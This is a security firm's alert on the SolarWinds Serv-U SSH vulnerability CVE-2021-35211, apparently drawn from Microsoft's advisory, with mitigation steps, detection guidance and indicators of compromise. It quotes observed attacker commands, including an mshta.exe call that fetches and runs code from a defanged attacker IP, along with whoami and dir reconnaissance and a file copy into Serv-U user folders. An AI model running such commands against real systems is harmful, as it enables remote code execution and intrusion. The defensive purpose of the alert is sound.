×

SolarWinds new Vulnerability CVE-2021-35211 – July 15, 2021

Cyber Intelligence Alerts
2021-07-19
Introduction

A 0-day remote code execution exploit is being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

The vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell (SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation would give attackers the ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data.

Actions

We recommend the following actions be taken to mitigate and reduce risk.

  • Apply latest Solarwinds Patches to Serv-U FTP Software
  • Block known malicious IP Addresses

    • 98[.]176[.]196[.]89
    • 68[.]235[.]178[.]32
    • 208[.]113[.]35[.]58
    • 144[.]34[.]179[.]162
    • 97[.]77[.]97[.]58
    • hxxp://144[.]34[.]179[.]162/a
Attack details

MSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from Serv-U.exe include:

  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
Detection guidance

Customers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A C0000005; CSUSSHSocket::ProcessReceive exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.
EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5
Additional signs of potential compromise include:

  • Recent creation of .txt files in the Client\Common\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.
  • Serv-U.exe spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for:
    • mshta.exe
    • powershell.exe
    • cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:
      • whoami
      • dir
      • ./Client/Common
      • .\Client\Common
      • type [a file path] > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive”
    • Any process with any of the following in the command line:
      • C:\Windows\Temp\
  • The addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users, which appears to store the Global users information.

Detection details

Antivirus detections
Microsoft Defender Antivirus detects threat components as the following malware:

  • Behavior:Win32/ServuSpawnSuspProcess.A
  • Behavior:Win32/ServuSpawnCmdClientCommon.A

Endpoint detection and response (EDR) alerts
Alerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:

  • Suspicious behaviour by Serv-U.exe

Azure Sentinel query
To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)
  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp

Lastly, to those who are leveraging our 24/7 Healthcare Security Operations Center (SOC) / SIEM, your network is being monitored and we will provide regular updates. To those who are not – please feel free to reach out to raheel.qureshi@isecurityconuslting.com or kees.pouw@isecurityconsulting.com and we will add you to our distribution list.

We will also provide updates to organizations we are servicing through our Incident Response Retainer.

Do not panic but stay safe and protected. We can always connect with you 1-on-1 to provide better guidance on how to gain better visibility into your controls, network, dark web, privileged user access protection and active threat hunting. The landscape around ransomware has evolved as the Healthcare sector is willing to pay ransom and malicious threat actors are now stronger than ever.

Please go ahead and share this with your peers.

For any other questions or concerns, please feel free to reach out to info@isecurityconsulting.com.

Best Regards,

The iSecurity Team

Recent Posts

How Remote Workforces Change the Way We Approach Digital Security

2021-03-11

Calian Expands Digital Healthcare and Cybersecurity Offerings with Cloud Life Cycle Management, Systems Integration Services, and Virtual Care

2021-02-22

Funding for eHealth to shore up defences after ransomware attack

2020-06-24